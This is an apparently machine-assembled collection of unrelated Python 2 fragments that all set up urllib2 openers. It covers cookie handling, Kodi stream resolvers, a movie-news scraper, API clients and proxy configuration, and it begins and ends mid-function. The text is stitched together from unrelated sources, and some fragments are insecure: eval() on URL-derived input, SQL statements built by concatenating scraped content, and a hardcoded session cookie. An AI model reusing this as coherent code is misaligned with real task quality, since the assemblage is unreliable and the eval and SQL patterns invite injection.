opener=ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj)); ClientCookie.install_opener(opener) # ------------------------------------------------- # Cookies instaladas, lanza la petición # ------------------------------------------------- inicio=time.clock() # Contador txheaders={} # Diccionario para las cabeceras if post is None: _log("read_body_and_headers GET request") # Construye el request else: _log("read_body_and_headers POST request") _log("read_body_and_headers ---------------------------") # Añade las cabeceras for header in headers: _log("read_body_and_headers header %s=%s" % (str(header[0]),str(header[1]))); txheaders[header[0]]=header[1] _log("read_body_and_headers ---------------------------"); req=Request(url,post,txheaders) if timeout is None: handle=urlopen(req) else: #Disponible en python 2.6 en adelante --> handle = urlopen(req, timeout=timeout) #Para todas las versiones: try: import socket; deftimeout=socket.getdefaulttimeout(); socket.setdefaulttimeout(timeout); handle=urlopen(req); socket.setdefaulttimeout(deftimeout) except: import sys for line in sys.exc_info(): _log( "%s" % line ) cj.save(ficherocookies) # Actualiza el almacén de cookies # Lee los datos y cierra if handle.info().get('Content-Encoding')=='gzip': buf=StringIO(handle.read()); f=gzip.GzipFile(fileobj=buf); data=f.read() else: data=handle.read() info=handle.info(); _log("read_body_and_headers Response"); returnheaders=[]; _log("read_body_and_headers ---------------------------") for header in info: _log("read_body_and_headers "+header+"="+info[header]); returnheaders.append([header,info[header]]) handle.close(); _log("read_body_and_headers ---------------------------") ''' # Lanza la petición try: response = urllib2.urlopen(req) # Si falla la repite sustituyendo caracteres especiales except: req = urllib2.Request(url.replace(" ","%20")) # Añade las cabeceras for header in headers: req.add_header(header[0],header[1]) response = urllib2.urlopen(req) ''' # Tiempo transcurrido fin=time.clock(); _log("read_body_and_headers Downloaded in %d seconds " % (fin-inicio+1)); _log("read_body_and_headers body="+data); return data,returnheaders
def query(action=None, command=None, args=None, method='GET', data=None): ''' Make a web call to a Parallels provider ''' path = config.get_cloud_config_value('url', get_configured_provider(), __opts__, search_global=False) auth_handler = urllib2.HTTPBasicAuthHandler() auth_handler.add_password( realm='Parallels Instance Manager', uri=path, user=config.get_cloud_config_value('user', get_configured_provider(), __opts__, search_global=False), passwd=config.get_cloud_config_value('password', get_configured_provider(), __opts__, search_global=False)) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) if action: path += action if command: path += '/{0}'.format(command) if not type(args, dict): args = {} kwargs = {'data': data} if isinstance(data, str) and '<?xml' in data: kwargs['headers'] = { 'Content-type': 'application/xml', } if args: params = urllib.urlencode(args) req = urllib2.Request(url='{0}?{1}'.format(path, params), **kwargs) else: req = urllib2.Request(url=path, **kwargs) req.get_method = lambda: method log.debug('{0} {1}'.format(method, req.get_full_url())) if data: log.debug(data) try: result = urllib2.urlopen(req) log.debug('PARALLELS Response Status Code: {0}'.format( result.getcode())) if 'content-length' in result.headers: content = result.read() result.close() items = ET.fromstring(content) return items return {} except urllib2.URLError as exc: log.error('PARALLELS Response Status Code: {0} {1}'.format( exc.code, exc.msg)) root = ET.fromstring(exc.read()) log.error(root) return {'error': root}
def getRegexParsed(regexs, url, cookieJar=None, forCookieJarOnly=False, recursiveCall=False, cachedPages={}, rawPost=False): #0,1,2 = URL, regexOnly, CookieJarOnly if not recursiveCall: regexs = eval(urllib.unquote(regexs)) #cachedPages = {} print 'url', url doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url) print 'doRegexs', doRegexs, regexs for k in doRegexs: if k in regexs: print 'processing ', k m = regexs[k] print m cookieJarParam = False if 'cookiejar' in m: # so either create or reuse existing jar #print 'cookiejar exists',m['cookiejar'] cookieJarParam = m['cookiejar'] if '$doregex' in cookieJarParam: cookieJar = getRegexParsed(regexs, m['cookiejar'], cookieJar, True, True, cachedPages) cookieJarParam = True else: cookieJarParam = True if cookieJarParam: if cookieJar == None: print 'create cookie jar' import cookielib cookieJar = cookielib.LWPCookieJar() #print 'cookieJar new',cookieJar if '$doregex' in m['page']: m['page'] = getRegexParsed(regexs, m['page'], cookieJar, recursiveCall=True, cachedPages=cachedPages) if 'post' in m and '$doregex' in m['post']: m['post'] = getRegexParsed(regexs, m['post'], cookieJar, recursiveCall=True, cachedPages=cachedPages) print 'post is now', m['post'] if 'rawpost' in m and '$doregex' in m['rawpost']: m['rawpost'] = getRegexParsed(regexs, m['rawpost'], cookieJar, recursiveCall=True, cachedPages=cachedPages, rawPost=True) print 'rawpost is now', m['rawpost'] if m['page'] in cachedPages and not 'ignorecache' in m and forCookieJarOnly == False: link = cachedPages[m['page']] else: #print 'Ingoring Cache',m['page'] req = urllib2.Request(m['page']) print 'req', m['page'] req.add_header( 'User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1' ) if 'refer' in m: req.add_header('Referer', m['refer']) if 'agent' in m: req.add_header('User-agent', m['agent']) if 'setcookie' in m: print 'adding cookie', m['setcookie'] req.add_header('Cookie', m['setcookie']) if not cookieJar == None: #print 'cookieJarVal',cookieJar cookie_handler = urllib2.HTTPCookieProcessor(cookieJar) opener = urllib2.build_opener( cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()) opener = urllib2.install_opener(opener) #print 'after cookie jar' post = None if 'post' in m: postData = m['post'] if '$LiveStreamRecaptcha' in postData: (captcha_challenge, catpcha_word) = processRecaptcha(m['page']) if captcha_challenge: postData += 'recaptcha_challenge_field:' + captcha_challenge + ',recaptcha_response_field:' + catpcha_word splitpost = postData.split(',') post = {} for p in splitpost: n = p.split(':')[0] v = p.split(':')[1] post[n] = v post = urllib.urlencode(post) if 'rawpost' in m: post = m['rawpost'] if '$LiveStreamRecaptcha' in post: (captcha_challenge, catpcha_word) = processRecaptcha(m['page']) if captcha_challenge: post += '&recaptcha_challenge_field=' + captcha_challenge + '&recaptcha_response_field=' + catpcha_word if post: response = urllib2.urlopen(req, post) else: response = urllib2.urlopen(req) link = response.read() link = javascriptUnEscape(link) response.close() cachedPages[m['page']] = link #print link print 'store link for', m['page'], forCookieJarOnly if forCookieJarOnly: return cookieJar # do nothing if '$doregex' in m['expre']: m['expre'] = getRegexParsed(regexs, m['expre'], cookieJar, recursiveCall=True, cachedPages=cachedPages) print 'exp k and url' print m['expre'], k, url print 'aa' if not m['expre'] == '': print 'doing it ', m['expre'] if not '$LiveStreamCaptcha' in m['expre']: reg = re.compile(m['expre']).search(link) val = reg.group(1).strip() if rawPost: print 'rawpost' val = urllib.quote_plus(val) if 'htmlunescape' in m: #val=urllib.unquote_plus(val) import HTMLParser val = HTMLParser.HTMLParser().unescape(val) url = url.replace("$doregex[" + k + "]", val) else: val = askCaptcha(m, link, cookieJar) print 'url and val', url, val url = url.replace("$doregex[" + k + "]", val) #return val else: url = url.replace("$doregex[" + k + "]", '') if '$epoctime$' in url: url = url.replace('$epoctime$', getEpocTime()) if recursiveCall: return url print 'final url', url item = xbmcgui.ListItem(path=url) #setResolvedUrl #xbmc.playlist(xbmc.playlist_video).clear() #xbmc.playlist(xbmc.playlist_video).add(url) #xbmc.Player().play(item=url) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
def fetchMiaopaiData(): lastid = None dr = re.compile(r'<[^>]+>', re.S) uname = '/app/yxtk/script/useragent.txt' f1 = open("/app/yxtk/script/data/1905movienews.sql", 'w', buffering=-1) with open(uname) as f: useragents = f.readlines() userAgent = random.choice(useragents) headers = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Cache-Control': 'max-age=0', 'Accept-Encoding': 'gzip, deflate, sdch', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Cache-Control': 'max-age=0', 'Connection': 'keep-alive', 'Cookie': '__uv_=6606525396; SpMLdaPxuv=m4127234796; CNZZDATA1253604207=1123659875-1462410988-null%7C1462410988; C_P_i=1; GED_PLAYLIST_ACTIVITY=W3sidSI6IkxxMnIiLCJ0IjoxNDYyNDE1MjExLCJlZCI6eyJqIjp7IkEiOnsidHQiOjkzLCJwZCI6OTMsImJzIjoxMCwiZXMiOjB9fSwiZiI6MTQ2MjQxNTIxMSwiYSI6W3sia3YiOnsiYyI6MSwibSI6NzEwfX0seyJrdiI6eyJjIjo2LCJzIjoyNCwibSI6NTE5fX0seyJrdiI6eyJtIjoxMzk2LCJzIjoxNCwiYyI6M319LHsia3YiOnsibSI6MjU0OCwiYyI6MX19LHsia3YiOnsicyI6MiwibSI6MjY3fX0seyJrdiI6eyJjIjo0LCJtIjozODY4LCJzIjo2fX1dfSwibnYiOjEsInBsIjo5MywibHQiOjE0NjI0MTUyMTF9XQ..; WOlTvIlgRpuvid_=1138; pvid=1462419488231; bfd_s=68774865.12702418.1462415058975; tmc=2.68774865.79541045.1462419484753.1462419484753.1462419488287; tma=68774865.23748224.1462415058979.1462415058979.1462415058979.1; tmd=15.68774865.23748224.1462415058979.; Hm_lvt_49411f7bde52035653f2e2b70a0bb6a5=1462415059; Hm_lpvt_49411f7bde52035653f2e2b70a0bb6a5=1462419488; Hm_lvt_5a9573957327e40b58294447cd1d8ad2=1462415059; Hm_lpvt_5a9573957327e40b58294447cd1d8ad2=1462419488; bfd_g=9de2782bcb754fd700004f6702618c9d556e9317; Hm_lvt_bfe9961e25bf081711e59b3f78be82d4=1462415059; Hm_lpvt_bfe9961e25bf081711e59b3f78be82d4=1462419488; WOlTvIlgRptime_=1462419488231', 'Host': 'www.1905.com', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36' } while True: for j in range(1, 3): time.sleep(1) pageNo = 0 if j == 1: url = 'http://www.1905.com/list-p-catid-220.html' if j == 2: url = 'http://www.1905.com/film/#fixedLeftMod' print url try: encoding_support = ContentEncodingProcessor opener = urllib2.build_opener(encoding_support) opener.addheaders = [('User-agent', userAgent[:-2]), ('Accept-Encoding', "gzip, deflate")] urllib2.install_opener(opener) req = urllib2.urlopen(url.strip(), timeout=5) html = req.read() req.close() if html.find("<!DOCTYPE") == -1: html = "<!DOCTYPE html><base href=http://learning.sohu.com><script type='text/javascript'>var pvinsight_page_ancestors = '200312880;401049313';</script><html><head><meta http-equiv='content-type' content='text/html; charset=utf-8' /></head><body>" + html + "</body></html>" try: html = html.replace( '<meta charset="utf-8">', '<meta http-equiv="content-type" content="text/html; charset=utf-8" /' ) except Exception as e: print e doc = pq(html) lis = doc('li.pic-pack-out') for li in lis.items(): movie_url = li('a.pic-url').attr('href') m = re.findall(r'(\w*[0-9]+)\w*', str(movie_url)) if len(m) == 3: movie_id = str(m[2]) else: movie_id = '0000' if li('a.pic-url').children('img').attr('src') is None: movie_pic = " " movie_id = '0000' else: movie_pic = li('a.pic-url').children('img').attr('src') movie_title = "\" " + li('a.title').html().encode( 'utf8') + " \"" movie_title = movie_title.replace("\n", '') movie_title = movie_title.replace(",", ',') movie_date = li('span.timer').html() imageUrl = qiniuUpdate(movie_pic.strip()) req = urllib2.Request(movie_url) res = urllib2.urlopen(req) html1 = unicode(res.read(), 'utf-8') html1 = re.sub(r'<script>(.*?)</script>', '', html1) res.close() doc1 = pq(html1) con = doc1('div.pic-content') con('img').removeAttr("style") con('img').removeAttr("width") con('img').removeAttr("height") con('img').attr("style", "width:100%") p = con('div.pic-content').html() if p is None or p == '': continue p = re.sub(r' ', '', p) p = re.sub(r'<style.*>([\S\s\t]*?)</style>', '', p) p = re.sub(r'<script.*>([\S\s\t]*?)</script>', '', p) p = re.sub(r'<p[^>]*>', '<p>', p) p = re.sub(r'<(?!img|br|p|/p).*?>', '', p) p = re.sub(r'\r', '', p) p = re.sub(r'\n', '', p) p = re.sub(r'\s', '', p) p = re.sub(r'src=', ' src=', p) #newqiniu = pq(p) #imgs = newqiniu('img') #for image in imgs.items(): #imgurl = image('img').attr('src') #newimgurl = qiniuUpdate(imgurl.strip()) #p = p.replace(str(imgurl),str(newimgurl)) sql = "INSERT INTO 3rd_tencent_news(id,creator,modifier,create_time,modify_time,is_deleted,title,time,img_url,thumbnail_url,source,content,push_flag,recommend_flag,view_status) VALUES(NULL,'sys','sys',now(),now(),'n'," + movie_title.strip( ) + ",now(),'" + imageUrl + "','" + imageUrl + "','1905电影网','" + p.strip( ) + "',0,NULL,0);" + '\n' print sql f1.writelines(sql) file_name = urllib2.unquote( movie_pic.strip()).decode('utf8').split('/')[-1] os.remove('/app/yxtk/script/' + file_name) except Exception as e: print e break f1.close()
def getRegexParsed( regexs, url, cookieJar=None, forCookieJarOnly=False, recursiveCall=False, cachedPages={}, rawPost=False, cookie_jar_file=None): #0,1,2 = URL, regexOnly, CookieJarOnly #cachedPages = {} #print 'url',url doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url) # print 'doRegexs',doRegexs,regexs setresolved = True for k in doRegexs: if k in regexs: #print 'processing ' ,k m = regexs[k] #print m cookieJarParam = False if 'cookiejar' in m: # so either create or reuse existing jar #print 'cookiejar exists',m['cookiejar'] cookieJarParam = m['cookiejar'] if '$doregex' in cookieJarParam: cookieJar = getRegexParsed(regexs, m['cookiejar'], cookieJar, True, True, cachedPages) cookieJarParam = True else: cookieJarParam = True #print 'm[cookiejar]',m['cookiejar'],cookieJar if cookieJarParam: if cookieJar == None: #print 'create cookie jar' cookie_jar_file = None if 'open[' in m['cookiejar']: cookie_jar_file = m['cookiejar'].split( 'open[')[1].split(']')[0] # print 'cookieJar from file name',cookie_jar_file cookieJar = getCookieJar(cookie_jar_file) # print 'cookieJar from file',cookieJar if cookie_jar_file: saveCookieJar(cookieJar, cookie_jar_file) #import cookielib #cookieJar = cookielib.LWPCookieJar() #print 'cookieJar new',cookieJar elif 'save[' in m['cookiejar']: cookie_jar_file = m['cookiejar'].split('save[')[1].split( ']')[0] complete_path = os.path.join(profile, cookie_jar_file) # print 'complete_path',complete_path saveCookieJar(cookieJar, cookie_jar_file) if m['page'] and '$doregex' in m['page']: pg = getRegexParsed(regexs, m['page'], cookieJar, recursiveCall=True, cachedPages=cachedPages) if len(pg) == 0: pg = 'http://regexfailed' m['page'] = pg if 'setcookie' in m and m['setcookie'] and '$doregex' in m[ 'setcookie']: m['setcookie'] = getRegexParsed(regexs, m['setcookie'], cookieJar, recursiveCall=True, cachedPages=cachedPages) if 'appendcookie' in m and m['appendcookie'] and '$doregex' in m[ 'appendcookie']: m['appendcookie'] = getRegexParsed(regexs, m['appendcookie'], cookieJar, recursiveCall=True, cachedPages=cachedPages) if 'post' in m and '$doregex' in m['post']: m['post'] = getRegexParsed(regexs, m['post'], cookieJar, recursiveCall=True, cachedPages=cachedPages) # print 'post is now',m['post'] if 'rawpost' in m and '$doregex' in m['rawpost']: m['rawpost'] = getRegexParsed(regexs, m['rawpost'], cookieJar, recursiveCall=True, cachedPages=cachedPages, rawPost=True) #print 'rawpost is now',m['rawpost'] if 'rawpost' in m and '$epoctime$' in m['rawpost']: m['rawpost'] = m['rawpost'].replace('$epoctime$', getEpocTime()) if 'rawpost' in m and '$epoctime2$' in m['rawpost']: m['rawpost'] = m['rawpost'].replace('$epoctime2$', getEpocTime2()) link = '' if m['page'] and m[ 'page'] in cachedPages and not 'ignorecache' in m and forCookieJarOnly == False: #print 'using cache page',m['page'] link = cachedPages[m['page']] else: if m['page'] and not m['page'] == '' and m['page'].startswith( 'http'): if '$epoctime$' in m['page']: m['page'] = m['page'].replace('$epoctime$', getEpocTime()) if '$epoctime2$' in m['page']: m['page'] = m['page'].replace('$epoctime2$', getEpocTime2()) #print 'Ingoring Cache',m['page'] page_split = m['page'].split('|') pageUrl = page_split[0] header_in_page = None if len(page_split) > 1: header_in_page = page_split[1] # if # proxy = urllib2.ProxyHandler({ ('https' ? proxytouse[:5]=="https":"http") : proxytouse}) # opener = urllib2.build_opener(proxy) # urllib2.install_opener(opener) # import urllib2 # print 'urllib2.getproxies',urllib2.getproxies() current_proxies = urllib2.ProxyHandler( urllib2.getproxies()) #print 'getting pageUrl',pageUrl req = urllib2.Request(pageUrl) if 'proxy' in m: proxytouse = m['proxy'] # print 'proxytouse',proxytouse # urllib2.getproxies= lambda: {} if pageUrl[:5] == "https": proxy = urllib2.ProxyHandler({'https': proxytouse}) #req.set_proxy(proxytouse, 'https') else: proxy = urllib2.ProxyHandler({'http': proxytouse}) #req.set_proxy(proxytouse, 'http') opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) req.add_header( 'User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1' ) proxytouse = None if 'referer' in m: req.add_header('Referer', m['referer']) if 'accept' in m: req.add_header('Accept', m['accept']) if 'agent' in m: req.add_header('User-agent', m['agent']) if 'x-req' in m: req.add_header('X-Requested-With', m['x-req']) if 'x-addr' in m: req.add_header('x-addr', m['x-addr']) if 'x-forward' in m: req.add_header('X-Forwarded-For', m['x-forward']) if 'setcookie' in m: # print 'adding cookie',m['setcookie'] req.add_header('Cookie', m['setcookie']) if 'appendcookie' in m: # print 'appending cookie to cookiejar',m['appendcookie'] cookiestoApend = m['appendcookie'] cookiestoApend = cookiestoApend.split(';') for h in cookiestoApend: n, v = h.split('=') w, n = n.split(':') ck = cookielib.Cookie(version=0, name=n, value=v, port=None, port_specified=False, domain=w, domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={'HttpOnly': None}, rfc2109=False) cookieJar.set_cookie(ck) if 'origin' in m: req.add_header('Origin', m['origin']) if header_in_page: header_in_page = header_in_page.split('&') for h in header_in_page: n, v = h.split('=') req.add_header(n, v) if not cookieJar == None: # print 'cookieJarVal',cookieJar cookie_handler = urllib2.HTTPCookieProcessor(cookieJar) opener = urllib2.build_opener( cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()) opener = urllib2.install_opener(opener) # print 'noredirect','noredirect' in m if 'noredirect' in m: opener = urllib2.build_opener( cookie_handler, NoRedirection, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()) opener = urllib2.install_opener(opener) elif 'noredirect' in m: opener = urllib2.build_opener( NoRedirection, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()) opener = urllib2.install_opener(opener) if 'connection' in m: # print '..........................connection//////.',m['connection'] from keepalive import HTTPHandler keepalive_handler = HTTPHandler() opener = urllib2.build_opener(keepalive_handler) urllib2.install_opener(opener) #print 'after cookie jar' post = None if 'post' in m: postData = m['post'] #if '$LiveStreamRecaptcha' in postData: # (captcha_challenge,catpcha_word,idfield)=processRecaptcha(m['page'],cookieJar) # if captcha_challenge: # postData=postData.replace('$LiveStreamRecaptcha','manual_recaptcha_challenge_field:'+captcha_challenge+',recaptcha_response_field:'+catpcha_word+',id:'+idfield) splitpost = postData.split(',') post = {} for p in splitpost: n = p.split(':')[0] v = p.split(':')[1] post[n] = v post = urllib.urlencode(post) if 'rawpost' in m: post = m['rawpost'] #if '$LiveStreamRecaptcha' in post: # (captcha_challenge,catpcha_word,idfield)=processRecaptcha(m['page'],cookieJar) # if captcha_challenge: # post=post.replace('$LiveStreamRecaptcha','&manual_recaptcha_challenge_field='+captcha_challenge+'&recaptcha_response_field='+catpcha_word+'&id='+idfield) link = '' try: if post: response = urllib2.urlopen(req, post) else: response = urllib2.urlopen(req) if response.info().get('Content-Encoding') == 'gzip': from StringIO import StringIO import gzip buf = StringIO(response.read()) f = gzip.GzipFile(fileobj=buf) link = f.read() else: link = response.read() if 'proxy' in m and not current_proxies is None: urllib2.install_opener( urllib2.build_opener(current_proxies)) link = javascriptUnEscape(link) #print repr(link) #print link This just print whole webpage in LOG if 'includeheaders' in m: #link+=str(response.headers.get('Set-Cookie')) link += '$$HEADERS_START$$:' for b in response.headers: link += b + ':' + response.headers.get( b) + '\n' link += '$$HEADERS_END$$:' # print link response.close() except: pass cachedPages[m['page']] = link #print link #print 'store link for',m['page'],forCookieJarOnly if forCookieJarOnly: return cookieJar # do nothing elif m['page'] and not m['page'].startswith('http'): if m['page'].startswith('$pyFunction:'): val = doEval(m['page'].split('$pyFunction:')[1], '', cookieJar, m) if forCookieJarOnly: return cookieJar # do nothing link = val link = javascriptUnEscape(link) else: link = m['page'] if '$doregex' in m['expres']: m['expres'] = getRegexParsed(regexs, m['expres'], cookieJar, recursiveCall=True, cachedPages=cachedPages) if not m['expres'] == '': #print 'doing it ',m['expres'] if '$LiveStreamCaptcha' in m['expres']: val = askCaptcha(m, link, cookieJar) #print 'url and val',url,val url = url.replace("$doregex[" + k + "]", val) elif m['expres'].startswith( '$pyFunction:') or '#$pyFunction' in m['expres']: #print 'expeeeeeeeeeeeeeeeeeee',m['expres'] val = '' if m['expres'].startswith('$pyFunction:'): val = doEval(m['expres'].split('$pyFunction:')[1], link, cookieJar, m) else: val = doEvalFunction(m['expres'], link, cookieJar, m) if 'ActivateWindow' in m['expres']: return if forCookieJarOnly: return cookieJar # do nothing if 'listrepeat' in m: listrepeat = m['listrepeat'] return listrepeat, eval(val), m, regexs, cookieJar try: url = url.replace(u"$doregex[" + k + "]", val) except: url = url.replace("$doregex[" + k + "]", val.decode("utf-8")) else: if 'listrepeat' in m: listrepeat = m['listrepeat'] ret = re.findall(m['expres'], link) return listrepeat, ret, m, regexs val = '' if not link == '': #print 'link',link reg = re.compile(m['expres']).search(link) try: val = reg.group(1).strip() except: traceback.print_exc() elif m['page'] == '' or m['page'] == None: val = m['expres'] if rawPost: # print 'rawpost' val = urllib.quote_plus(val) if 'htmlunescape' in m: #val=urllib.unquote_plus(val) import HTMLParser val = HTMLParser.HTMLParser().unescape(val) try: url = url.replace("$doregex[" + k + "]", val) except: url = url.replace("$doregex[" + k + "]", val.decode("utf-8")) #print 'ur',url #return val else: url = url.replace("$doregex[" + k + "]", '') if '$epoctime$' in url: url = url.replace('$epoctime$', getEpocTime()) if '$epoctime2$' in url: url = url.replace('$epoctime2$', getEpocTime2()) if '$GUID$' in url: import uuid url = url.replace('$GUID$', str(uuid.uuid1()).upper()) if '$get_cookies$' in url: url = url.replace('$get_cookies$', getCookiesString(cookieJar)) if recursiveCall: return url #print 'final url',repr(url) if url == "": return else: return url, setresolved
def __init__(self): #保存cookie self.cj = cookielib.LWPCookieJar() cookie_support = urllib2.HTTPCookieProcessor(self.cj) opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler) urllib2.install_opener(opener)
def open_packet_log(): httpHandler = urllib2.HTTPHandler(debuglevel=1) httpsHandler = urllib2.HTTPSHandler(debuglevel=1) opener = urllib2.build_opener(httpHandler, httpsHandler) urllib2.install_opener(opener) pass
def start(args): """Login and session handler """ # create cookiejar args._cj = LWPCookieJar() # lets urllib handle cookies opener = build_opener(HTTPCookieProcessor(args._cj)) opener.addheaders = [("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"), ("Accept-Encoding", "identity"), ("Accept", "*/*"), ("Content-Type", "application/x-www-form-urlencoded")] install_opener(opener) # load cookies try: args._cj.load(getCookiePath(args), ignore_discard=True) except IOError: # cookie file does not exist pass # get login informations username = args._addon.getSetting("crunchyroll_username") password = args._addon.getSetting("crunchyroll_password") # session management if not (args._session_id and args._auth_token): # create new session payload = {"device_id": args._device_id, "device_type": API.DEVICE, "access_token": API.TOKEN} req = request(args, "start_session", payload, True) # check for error if req["error"]: return False args._session_id = req["data"]["session_id"] # make login payload = {"password": password, "account": username} req = request(args, "login", payload, True) # check for error if req["error"]: return False args._auth_token = req["data"]["auth"] if not getattr(args, "_session_restart", False): pass else: # restart session payload = {"device_id": args._device_id, "device_type": API.DEVICE, "access_token": API.TOKEN, "auth": args._auth_token} req = request(args, "start_session", payload, True) # check for error if req["error"]: destroy(args) return False args._session_id = req["data"]["session_id"] args._auth_token = req["data"]["auth"] args._session_restart = False return True
def fetch_shims(): """ Download shim files from remote server """ import urllib2 attempts = 0 shims = iter(( "operaextensions_background.js", "operaextensions_popup.js", "operaextensions_injectedscript.js", )) shim_dir = os.path.join(shim_fs_path, shim_dirname) shim = next(shims) url = shim_fetch_from + shim while attempts < 10: attempts += 1 try: res = urllib2.urlopen(url) if res.code == 200: try: if not os.path.exists(shim_dir): os.mkdir(shim_dir) elif os.path.isdir(shim_dir): fh = open(os.path.join(shim_dir, shim), 'w') fh.write(res.read()) fh.close() except Exception as e: sys.exit("ERROR: Unable to fetch shim files from " + url + "\nException was :" + str(e)) else: if debug: print(('Response:', res.code)) try: shim = next(shims) except StopIteration: break url = shim_fetch_from + shim except urllib2.HTTPError as ex: if ex.code == 401: if debug: print(('HTTP Authentication required:', ex.code, ex.msg, ex.hdrs)) auth_type = ex.hdrs["WWW-Authenticate"].split()[0] realm = ex.hdrs["WWW-Authenticate"].split('=')[1] realm = realm.strip('"') if auth_type == "Basic": auth_handler = urllib2.HTTPBasicAuthHandler() print("Basic auth: Realm: ", realm) print("Enter username:"******"\n") print("Enter password:"******"\n") auth_handler.add_password(realm=realm, uri=shim_fetch_from, user=usr, passwd=pwd) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) continue else: print(('Threw :', ex, ' when fetching ', url))
def set_proxy(): proxy = urllib2.ProxyHandler({'http':'wwwcache.open.ac.uk:80', 'https': 'wwwcache.open.ac.uk:80'}) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener)
def send(self, method="GET", path=None, args=None, data=None, auth=False): """ Send a request to the Wrike API @param method: the HTTP method @param path: the path relative to the repository URL @param data: the data to send @param auth: this is an authorization request """ repository = self.repository # Request URL api = "oauth2/token" if auth else "api/v3" url = "/".join((repository.url.rstrip("/"), api)) if path: url = "/".join((url, path.lstrip("/"))) if args: url = "?".join((url, urllib.urlencode(args))) # Create the request req = urllib2.Request(url=url) handlers = [] if not auth: # Install access token header access_token = self.access_token if not access_token: message = "Authorization failed: no access token" current.log.error(message) return None, message req.add_header("Authorization", "%s %s" % (self.token_type, access_token)) # JSONify request data request_data = json.dumps(data) if data else "" if request_data: req.add_header("Content-Type", "application/json") else: # URL-encode request data for auth request_data = urllib.urlencode(data) if data else "" # Indicate that we expect JSON response req.add_header("Accept", "application/json") # Proxy handling config = repository.config proxy = repository.proxy or config.proxy or None if proxy: current.log.debug("using proxy=%s" % proxy) proxy_handler = urllib2.ProxyHandler({"https": proxy}) handlers.append(proxy_handler) # Install all handlers if handlers: opener = urllib2.build_opener(*handlers) urllib2.install_opener(opener) # Execute the request response = None message = None try: if method == "POST": f = urllib2.urlopen(req, data=request_data) else: f = urllib2.urlopen(req) except urllib2.HTTPError, e: message = "HTTP %s: %s" % (e.code, e.reason)
if options.username: usr=options.username if options.password: pw=options.password else: try: pw=os.environ['ICO_PW'] except: print("Please specify your ICO password") pw=raw_input() password_manager.add_password(None, options.url, usr, pw) auth = urllib2.HTTPBasicAuthHandler(password_manager) # create an authentication handler opener = urllib2.build_opener(auth) # create an opener with the authentication handler urllib2.install_opener(opener) # install the opener... action=options.action.lower()[0] ICOType=options.itemtype.lower()[0] if ICOType == 'c': if action == 'l': url="{0}/orchestrator/v2/categories?_limit={1}".format(options.url, options.list_limit) request = urllib2.Request(url) handler = urllib2.urlopen(request) j=json.loads(handler.read()) if options.debug: print(formatted(j)) cats={} for cat in j['items']:
def setup_cookie(): cj = cookielib.CookieJar(); opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)); urllib2.install_opener(opener);
def main(): # Connection variables csw_url = 'csw.open.canada.ca/geonetwork/srv/csw' csw_user = None csw_passwd = None proxy_protocol = None proxy_url = None proxy_user = None proxy_passwd = None records_per_request = 10 # Or read from a .ini file harvester_file = 'config/harvester.ini' if os.path.isfile(harvester_file): from ConfigParser import ConfigParser ini_config = ConfigParser() ini_config.read(harvester_file) csw_url = ini_config.get('csw', 'url') # Get configuration options if ini_config.has_option('csw', 'username'): csw_user = ini_config.get('csw', 'username') csw_passwd = ini_config.get('csw', 'password') if ini_config.has_option('proxy', 'protocol'): proxy_protocol = ini_config.get('proxy', 'protocol') if ini_config.has_option('proxy', 'url'): proxy_url = ini_config.get('proxy', 'url') if ini_config.has_option('proxy', 'username'): proxy_user = ini_config.get('proxy', 'username') proxy_passwd = ini_config.get('proxy', 'password') if ini_config.has_option('processing', 'records_per_request'): records_per_request = int( ini_config.get('processing', 'records_per_request')) if ini_config.has_option('processing', 'start_date'): start_date = ini_config.get('processing', 'start_date') # If your supplying a proxy if proxy_url: # And your using authentication if proxy_user and proxy_passwd: password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() password_mgr.add_password(None, proxy_url, proxy_user, proxy_passwd) proxy_auth_handler = urllib2.ProxyBasicAuthHandler(password_mgr) # or even if your not else: proxy_auth_handler = urllib2.ProxyHandler( {proxy_protocol: proxy_url}) opener = urllib2.build_opener(proxy_auth_handler) urllib2.install_opener(opener) # Fetch the data # csw = CatalogueServiceWeb( # 'https://*****:*****@csw_url/geonetwork/srv/csw') if csw_user and csw_passwd: csw = CatalogueServiceWeb('https://' + csw_url, username=csw_user, password=csw_passwd, timeout=20) else: csw = CatalogueServiceWeb('https://' + csw_url, timeout=20, skip_caps=True) request_template = """<?xml version="1.0"?> <csw:GetRecords xmlns:csw="http://www.opengis.net/cat/csw/2.0.2" service="CSW" version="2.0.2" resultType="results" outputSchema="csw:IsoRecord" maxRecords="%d" startPosition="%d" > <csw:Query typeNames="gmd:MD_Metadata"> <csw:ElementSetName>full</csw:ElementSetName> <csw:Constraint version="1.1.0"> <Filter xmlns="http://www.opengis.net/ogc" xmlns:gml="http://www.opengis.net/gml"> <PropertyIsGreaterThanOrEqualTo> <PropertyName>Modified</PropertyName> <Literal>%s</Literal> </PropertyIsGreaterThanOrEqualTo> </Filter> </csw:Constraint> </csw:Query> </csw:GetRecords> """ # Is there a specified start date if arguments['-f']: 